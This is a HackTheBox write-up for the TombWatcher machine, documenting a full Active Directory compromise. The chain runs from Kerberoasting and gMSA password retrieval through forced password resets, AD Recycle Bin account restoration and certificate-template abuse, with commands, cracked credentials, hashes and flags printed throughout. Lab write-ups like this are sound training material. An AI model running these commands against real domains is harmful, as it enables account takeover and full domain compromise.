HackTheBox TombWatcher
Writeup for HackTheBox TombWatcher
HackTheBox TombWatcher
Machine Synopsis
Key exploitation techniques:
- Active Directory enumeration with BloodHound
- Kerberoasting (Targeted) for hash cracking
- Active Directory Recycle Bin attack to restore deleted users
- Active Directory Certificate Services (AD CS) ESC1 (Enrollment Agent) abuse
- Certificate authentication for NTLM hash retrieval
- WinRM access via NTLM hash
Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
➜ TombWatcher nmap -p- --min-rate 10000 10.10.11.72
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49666/tcp open unknown
49693/tcp open unknown
49694/tcp open unknown
49696/tcp open unknown
49714/tcp open unknown
49729/tcp open unknown
49755/tcp open unknown
➜ TombWatcher nmap -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49693,49694,49696,49714,49729,49755 -sC -sV 10.10.11.72
PORT STATE SERVICE VERSION
53/tcp open domain (generic dns response: SERVFAIL)
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb)
5985/tcp open http Microsoft HTTPAPI httpd 2.0
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC01; OS: Windows
The hostname tombwatcher.htb and DC01.tombwatcher.htb were added to /etc/hosts.
1
➜ TombWatcher echo -e '10.10.11.72\t\ttombwatcher.htb DC01.tombwatcher.htb' | sudo tee -a /etc/hosts
Exploitation
Initial Access (Alfred via Kerberoasting)
The bloodhound-python tool was used with the provided credentials (henry/H3nry_987TGV!) to collect Active Directory data. Before running, the attacker’s system time was synchronized with the Domain Controller to avoid Kerberos authentication issues.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
➜ TombWatcher sudo ntpdate 'dc01.tombwatcher.htb'
➜ TombWatcher sudo bloodhound-python -u 'henry' -p 'H3nry_987TGV!' -d 'tombwatcher.htb' -ns 10.10.11.72 --zip -c All -dc 'dc01.tombwatcher.htb'
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: tombwatcher.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.tombwatcher.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 9 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.tombwatcher.htb
INFO: Done in 00M 04S
INFO: Compressing output into 20250621113709_bloodhound.zip
targetedKerberoast.py was used to attempt Kerberoasting with henry’s credentials.
1
2
3
4
5
6
7
8
➜ TombWatcher git clone https://github.com/ShutdownRepo/targetedKerberoast
➜ TombWatcher python3 targetedKerberoast/targetedKerberoast.py -v -d tombwatcher.htb -u 'henry' -p 'H3nry_987TGV!'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (Alfred)
[+] Printing hash for (Alfred)
$krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$352f4a7480224626f72065c21fd960e7$7ac36044d03aa36d154d76ecf603e351510673243ea46137e44838aada982141e19f66dc9998a046d32703c2eeeef2f8e03657173a91589a166f33a95fdc590763b8f929bae8e16a06b7d33596e1c2671d85a20746786f1f313d74488bb6ba104c7e3e895afe113fd1374c7a4d03858ead627b9daada9ee65844e551b79d305a6d94c7151720669c7e07a6011aa54d3e46bd650c96196248ce70ee58eb1189837a164932010b712cc904363cc41daefa52d7c79de078edda8ac7e05e1c39433345e280385fb32a1ed8fa33615e81441e486b410e51816868cc2fb0cc91bbdfdb59b2048cbefb05a1dcbc65a33eaa89f5f205f846ba03ac58d9bbb3b8c87a6d8a35f84febecdb0c5876b80853f9016cf8062d4193bf609f7ee9b1de07cca1a62b79cfbbdce9ebd7b3f16e2599ce0d238756a516faa129f3a58238c617f1bbb3777914c4bb7ff15b7470ab1b125af182b266a3015e88a70533eef1bc5d1a9b5bfd83ce610dfd1fa1cc46064e80ca7916f3df78032ae728e31f91a185fa64e30eb847f130d4a271731b3475c3df3c2a8816804e6f55e62e41022f580a91089aa7418c8350cea91013d350cb319996c4288c0e924b095ca34b9941afcfb041c12b114b400720a40d56649db29bb861c6adc8bedf3f0895f3f9ebaeabce182e6cc3430319ff6cb63838461a6efc1efccff2ac06ceb3f41c183334da1b8fbb12889e49a006b47e83e821e3258f7e553df82e1a949c39112e1c9edf3b0ac96e9b4755b51f81e75bbcb7fc23ec519aefa7ab829f49391a716467c8934a3de94c6e9b98b62e96ab41c7b1663bf9f5693cc7122e1b73a3c2195d9e17de3add157ce35376c23357a4920f1cfbe5b4f780d3efb1612f681939870341c3fa27a0cd6a692465182c502c02805ba6e6a90ac7db6f969229de67b8cd76f89837932e7b60cb4092f239f288f90396ce34387f07b27fa32813db7dac9212b77f40e08f84ce1a590e2ccbba906a9b9fad01b4095efbf3c7a887c5ed4ecb5e4ad3f6589ee01a136e13f73b205653463e6c95340e646116383008c0d47e388d9ce5451bf4ed9056ec495fe8a6c39b4be27b0f726770e2a20dad53807895ab0d4e7e93dccec316a0128110c1dc6470954ef494f77d6c67742f38a4b5023775622f4512c6f2144cc01d33860eb0ff22ca29d558ba5dde5aef9a68b326db39b1196b44179d41d2d93564cd3796a9d58b4a0c5973aa9ffe2631e0c446c1b0465831fc8f3611f1f23a89ee7c476954d8fd4e41c9a14a6405af7dbb8bb7161c3e4b935941072a5584a657e1446bd1859055b6be4aa0850296fd8fb8347e42051f28221aa83afd93ed7f99f744f621aa1c6ce837779658df38a38f20691fa527cdb49dfafd0cd3984619d9a09b32c1de363603d4122b9c2465f70157278da6623282b532634466391bd6faa860fd42bc1d0eb440dced666af835023979804be3affc4e
[VERBOSE] SPN removed successfully for (Alfred)
This yielded an SPN hash for Alfred. The hash was identified as Kerberos TGS-REP (13100) and cracked using hashcat with rockyou.txt.
1
2
3
➜ TombWatcher hashcat -a 0 -m 13100 alfred.hash /usr/share/wordlists/rockyou.txt --force
...
$krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$...:basketball
The password for Alfred was basketball.
Alfred was added to the Infrastructure group using bloodyAD.
1
2
➜ TombWatcher bloodyAD --host dc01.tombwatcher.htb -d tombwatcher.htb -u 'alfred' -p 'basketball' add groupMember Infrastructure alfred
[+] alfred added to Infrastructure
Using Alfred’s credentials, the msDS-ManagedPassword attribute for the ANSIBLE_DEV$ account was retrieved using bloodyAD.
1
2
3
4
➜ TombWatcher bloodyAD --host dc01.tombwatcher.htb -d tombwatcher.htb -u 'alfred' -p 'basketball' get object 'ANSIBLE_DEV$' --attr msDS-ManagedPassword
distinguishedName: CN=ansible_dev,CN=Managed Service Accounts,DC=tombwatcher,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:4b21348ca4a9edff9689cdf75cbda439
msDS-ManagedPassword.B64ENCODED: YRowaTv017+Uz2L8SEJ+RJ4IqND8txGK9cqERGZIDrfgJVIt1XFlPG5GWmb29E29EqrtVwlmOWPK1zr7x5QJbMxMFj7nXqjfYwaHn7Fk8YQQl8WVa2A2Xn4RFiNB9KuqJT/iMkXDL9sUAuCnWy3lS8aLCvAS8TPTg/NgMdvg/325btI8bb8vcHUF8ObBNj0Sf6brU2qWtfdRqQA5DzgG8shYzDSFxGm4pd6x2nhKTOojSgQQg5FQBrim7FV/8Mhzp2IkRiwxOPv6FYdGsU3F2op7y0MZGKXpmvGVXVaYfViYHbsd3oK+kSXlkJth9xmkhQWK0jEV3Zf7Odpr0uwnSg==
The NTLM hash 4b21348ca4a9edff9689cdf75cbda439 for ansible_dev$ was retrieved. This hash was used to authenticate via SMB with nxc.
1
2
➜ TombWatcher nxc smb tombwatcher.htb -u 'ansible_dev$' -H '4b21348ca4a9edff9689cdf75cbda439'
SMB 10.10.11.72 445 DC01 [+] tombwatcher.htb\ansible_dev$:4b21348ca4a9edff9689cdf75cbda439
Using bloodyAD, the password for sam was reset to password!.
1
2
➜ TombWatcher bloodyAD --host dc01.tombwatcher.htb -d tombwatcher.htb -u 'ansible_dev$' -p ':4b21348ca4a9edff9689cdf75cbda439' set password "sam" 'password!'
[+] Password changed successfully!
sam was granted GenericAll rights on john and john’s password was reset to password!.
1
2
3
4
5
6
7
8
➜ TombWatcher bloodyAD --host dc01.tombwatcher.htb -d tombwatcher.htb -u 'sam' -p 'password!' set owner 'john' 'sam'
[+] Old owner S-1-5-21-1392491010-1358638721-2126982587-512 is now replaced by sam on john
➜ TombWatcher bloodyAD --host dc01.tombwatcher.htb -d tombwatcher.htb -u 'sam' -p 'password!' add genericAll 'john' 'sam'
[+] sam has now GenericAll on john
➜ TombWatcher bloodyAD --host dc01.tombwatcher.htb -d tombwatcher.htb -u 'sam' -p 'password!' set password "john" 'password!'
[+] Password changed successfully!
WinRM access was then established as john with the new password.
1
2
➜ TombWatcher nxc winrm tombwatcher.htb -u 'john' -p 'password!'
WINRM 10.10.11.72 5985 DC01 [+] tombwatcher.htb\john:password! (Pwn3d!)
The user.txt flag was retrieved.
1
2
3
➜ TombWatcher evil-winrm -u john -p 'password!' -i tombwatcher.htb
*Evil-WinRM* PS C:\Users\john\Desktop> type user.txt
f28bc84bbd34f6eaccfd703732b7e3d3
Privilege Escalation
Active Directory Recycle Bin Attack & AD CS ESC1
The Active Directory Recycle Bin was leveraged to restore a deleted cert_admin account. First, the Recycle Bin Feature status was checked.
1
2
3
4
5
6
7
8
9
10
11
*Evil-WinRM* PS C:\Users\john\Desktop> Get-ADOptionalFeature 'Recycle Bin Feature'
DistinguishedName : CN=Recycle Bin Feature,CN=Optional Features,CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=tombwatcher,DC=htb
EnabledScopes : {CN=Partitions,CN=Configuration,DC=tombwatcher,DC=htb, CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=tombwatcher,DC=htb}
FeatureGUID : 766ddcd8-acd0-445e-f3b9-a7f9b6744f2a
FeatureScope : {ForestOrConfigurationSet}
IsDisableable : False
Name : Recycle Bin Feature
ObjectClass : msDS-OptionalFeature
ObjectGUID : 907469ef-52c5-41ab-ad19-5fdec9e45082
RequiredDomainMode :
RequiredForestMode : Windows2008R2Forest
Deleted user objects named cert_admin were searched for in the Deleted Objects container.
1
2
3
4
5
6
7
8
9
10
11
12
*Evil-WinRM* PS C:\Users\john\Desktop> Get-ADObject -SearchBase "CN=Deleted Objects,DC=tombwatcher,DC=htb" -LDAPFilter "(objectClass=user)" -IncludeDeletedObjects -Properties objectSid, samAccountName, lastKnownParent, whenChanged
...
Deleted : True
DistinguishedName : CN=cert_admin\0ADEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3,CN=Deleted Objects,DC=tombwatcher,DC=htb
LastKnownParent : OU=ADCS,DC=tombwatcher,DC=htb
Name : cert_admin
ObjectClass : user
ObjectGUID : f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
objectSid : S-1-5-21-1392491010-1358638721-2126982587-1109
samAccountName : cert_admin
whenChanged : 6/20/2025 3:05:49 PM
...
The cert_admin object with ObjectGUID 938182c3-bf0b-410a-9aaa-45c8e1a02ebf was restored. Its password was reset to password!, and the account was enabled.
1
2
3
*Evil-WinRM* PS C:\Users\john\Desktop> Restore-ADObject -Identity '938182c3-bf0b-410a-9aaa-45c8e1a02ebf'
*Evil-WinRM* PS C:\Users\john\Desktop> Set-ADAccountPassword -Identity 'cert_admin' -Reset -NewPassword (ConvertTo-SecureString 'password!' -AsPlainText -Force)
*Evil-WinRM* PS C:\Users\john\Desktop> Enable-ADAccount -Identity 'cert_admin'
The restored cert_admin account was confirmed to have SMB and LDAP access.
1
2
3
4
5
➜ TombWatcher nxc smb tombwatcher.htb -u 'cert_admin' -p 'password!'
SMB 10.10.11.72 445 DC01 [+] tombwatcher.htb\cert_admin:password!
➜ TombWatcher nxc ldap tombwatcher.htb -u 'cert_admin' -p 'password!'
LDAP 10.10.11.72 389 DC01 [+] tombwatcher.htb\cert_admin:password!
Certipy was used to find vulnerable certificate templates.
1
2
3
4
5
6
7
➜ TombWatcher certipy-ad find -target tombwatcher.htb -u 'john' -p 'password!'
[*] Found 33 certificate templates
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Successfully retrieved CA configuration for 'tombwatcher-CA-1'
certutil -template WebServer was run to examine the WebServer template.
1
2
3
4
5
6
7
*Evil-WinRM* PS C:\Users\john\Desktop> certutil -template WebServer
TemplatePropCommonName = WebServer
...
Allow Enroll TOMBWATCHER\Domain Admins
Allow Enroll TOMBWATCHER\Enterprise Admins
Allow Enroll S-1-5-21-1392491010-1358638721-2126982587-1111
...
The WebServer template allowed enrollment by specific SIDs, including S-1-5-21-1392491010-1358638721-2126982587-1111 (which corresponds to cert_admin). This indicates an ESC1 (Enrollment Agent) vulnerability.
A certificate was requested on behalf of the Administrator using cert_admin’s credentials and the WebServer template, specifying the “Certificate Request Agent” application policy.
1
2
3
4
5
6
➜ TombWatcher certipy-ad req -target 'tombwatcher.htb' -u 'cert_admin' -p 'password!' -ca tombwatcher-CA-1 -template WebServer -application-policies "Certificate Request Agent"
[*] Request ID is 20
[*] Successfully requested certificate
[*] Got certificate without identity
[*] Certificate has no object SID
[*] Saving certificate and private key to 'cert_admin.pfx'
The cert_admin.pfx file was uploaded to the target using evil-winrm.
1
2
3
*Evil-WinRM* PS C:\Users\john\Desktop> upload ./cert_admin.pfx
Info: Uploading /home/shiro/Documents/HackTheBox/Machines/TombWatcher/cert_admin.pfx to C:\Users\john\Desktop\cert_admin.pfx
Info: Upload successful!
A new certificate was requested on behalf of Administrator@tombwatcher.htb using the cert_admin.pfx and the User template.
1
2
3
4
5
6
➜ TombWatcher certipy-ad req -target tombwatcher.htb -dc-ip 10.10.11.72 -u 'cert_admin' -p 'password!' -ca tombwatcher-CA-1 -template User -pfx 'cert_admin.pfx' -on-behalf-of 'tombwatcher\Administrator'
[*] Request ID is 21
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrator@tombwatcher.htb'
[*] Certificate object SID is 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Saving certificate and private key to 'administrator.pfx'
The administrator.pfx was then used to authenticate and retrieve the Administrator’s NTLM hash.
1
2
3
4
➜ TombWatcher sudo ntpdate tombwatcher.htb
➜ TombWatcher certipy-ad auth -dc-ip 10.10.11.72 -pfx administrator.pfx
[*] Using principal: 'administrator@tombwatcher.htb'
[*] Got hash for 'administrator@tombwatcher.htb': aad3b435b51404eeaad3b435b51404ee:f61db423bebe3328d33af26741afe5fc
The Administrator’s NTLM hash was used to gain a root shell via evil-winrm.
1
2
3
4
➜ TombWatcher sudo evil-winrm -i tombwatcher.htb -u 'administrator' -H 'f61db423bebe3328d33af26741afe5fc'
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
f628d80838a6d74139ab0f5ea8694230
The root.txt flag was retrieved.
Cleanup
For proper operational security, any created artifacts and modifications to the Active Directory environment should be reverted.
1
2
3
4
5
# On target machine as Administrator (via Evil-WinRM)
# Disable and delete the restored cert_admin account
Set-ADAccountPassword -Identity 'cert_admin' -Reset -NewPassword (ConvertTo-SecureString 'OriginalPasswordHere' -AsPlainText -Force)
Disable-ADAccount -Identity 'cert_admin'
Remove-ADObject -Identity 'CN=cert_admin,OU=ADCS,DC=tombwatcher,DC=htb' -Recursive:$true -WhatIf # Remove -WhatIf after testing
This post is licensed under CC BY 4.0 by the author.